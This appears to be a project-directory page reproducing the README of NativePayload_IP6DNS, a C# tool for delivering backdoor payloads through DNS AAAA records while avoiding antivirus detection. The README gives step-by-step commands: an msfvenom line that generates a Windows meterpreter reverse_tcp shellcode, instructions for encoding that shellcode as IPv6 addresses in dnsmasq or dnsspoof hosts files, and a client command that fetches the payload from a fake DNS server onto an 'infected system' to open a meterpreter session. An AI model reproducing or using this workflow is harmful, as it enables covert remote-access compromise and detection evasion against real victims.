NativePayload IP6DNS Save

C# code for Transferring Backdoor Payloads by IPv6 Address (AAAA) records and DNS Traffic also Bypassing Anti-viruses

Project README


Published by Damon Mohammadbagher

this tool working like NativePayload_DNS , but in this case this tool working by IPv6 Address and AAAA records for Transferring Backdoor payloads by DNS Traffic ;)

note : this code supported only 990 bytes (99 lines IPV6 ADDRESS foreach 10 bytes) for Payloads , for changing this value you should change source code

note : {fe80:1111:}{fc48:83e4:f0e8:cc00:0000}{:ae0} {}

note : 10 bytes Payload ==> {fc48:83e4:f0e8:cc00:0000} and {:ae0} is payload counter or ID

Example: msfvenum --arch x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost= -f c > /payload_string.txt

Replace your Payload_strings.txt file from "\0xfc\0x48\0x83..." to "fc4883..."

syntax 1 : NativePayload_IP6DNS.exe null "payload string"

Description 1 : Making Hosts files for Linux Dns Server Like Dnsmasq or dnsspoof tools , copy output for this command to DNS Hosts file in linux you can use Msfvenom tool like example and copy your payload in "payload string"

Example : payload string ==> fc4883e4f0e8cc000000415141505251564831d2ae1

Example: NativePayload_IP6DNS.exe null "payload string" > /dnsmasq.hosts

after this command you have something like these lines in your Hosts file :

Example : /etc/dnsmasq.hosts or /etc/hosts "depend on your configuration for dnsmasq or dnsspoof tools












syntax 2 : NativePayload_IP6DNS.exe Payload

description 2 : this switch is for making sample payload for your hosts file

syntax 3 : NativePayload_IP6DNS.exe "FQDN" "Fake_DNS_Server"

description 3 : after making your payloads and copy that in your fake_DNS_Server by dnsmasq or dnsspoof and starting fakeDNSServer , now you can start transferring your Payloads From FakeDNSServer to your Infected system by NativePayload_IP6DNS.exe tool

Example : NativePayload_IP6DNS.exe

note : in this case is your FakeDNSServer also this is your Metasploit: Meterpreter/Listener.

you should have meterpreter session after 1 DNS Response from FakeDNSserver to Client (Backdoor system)

Article : Transferring Backdoor Payloads by DNS AAAA records and IPv6 Address:

link 0:

link 1:

Open Source Agenda is not affiliated with "NativePayload IP6DNS" Project. README Source: DamonMohammadbagher/NativePayload_IP6DNS
Open Issues
Last Commit
1 year ago

Open Source Agenda Badge

Open Source Agenda Rating